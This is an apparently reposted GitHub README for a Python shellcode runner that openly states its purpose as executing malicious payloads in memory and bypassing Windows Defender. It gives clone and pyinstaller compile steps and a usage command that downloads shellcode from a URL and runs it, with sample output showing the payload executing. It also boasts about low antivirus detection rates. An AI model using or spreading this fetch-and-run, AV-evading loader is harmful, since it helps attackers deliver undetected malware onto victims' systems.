buffshark-shellcode-runner
2021-12-15 23:32:30 Author: github.com(查看原文) 阅读量:9 收藏

Python Shellcode Runner to execute malicious payload and bypass AV

This script utilizes mmap(for linux) and win api wrappers (for windows) to execute shellcode in memory and bypass Windows Defender.

Installation and Compiling

  1. Download the repo: git clone https://github.com/momo1239/buffshark-shellcode-runner
  2. Move directory: cd buffshark-shellcode-runner/
└─# python3 buffshark.py -h                                       
==========================
Buff Shark Shellcode Runner
 Author: Momo Nguyen
==========================
usage: buffshark.py [-h] -u  -a

Python Shellcode Runner

optional arguments:
  -h, --help   show this help message and exit
  -u , --url   URL to raw shellcode file
  -a , --os    Choose OS: win/nix
  1. Optional: Install pyinstaller to compile to windows executable: pip install pyinstaller
  2. Optional: Compile: pyinstaller -F buffshark.py

Usage

Example: python3 buffshark.py -u http://127.0.0.1:8080/shellcode.bin -a [win/nix]

==========================
Buff Shark Shellcode Runner
 Author: Momo Nguyen 
==========================
[+] Downloading shellcode...
[+] 49 Bytes Downloaded!
[+] Running shellcode in memory...
README.md  antiscan.PNG  antiscanres.PNG  buffshark.exe  buffshark.py  shell.bin  shellcode

AV Scan

As of 11/22/2021, Windows Defender does not flag this shellcode runner.

1/26 AV has flagged buffshark on antiscan.me

image

image


文章来源: https://github.com/y35uishere/buffshark-shellcode-runner
如有侵权请联系:admin#unsafe.sh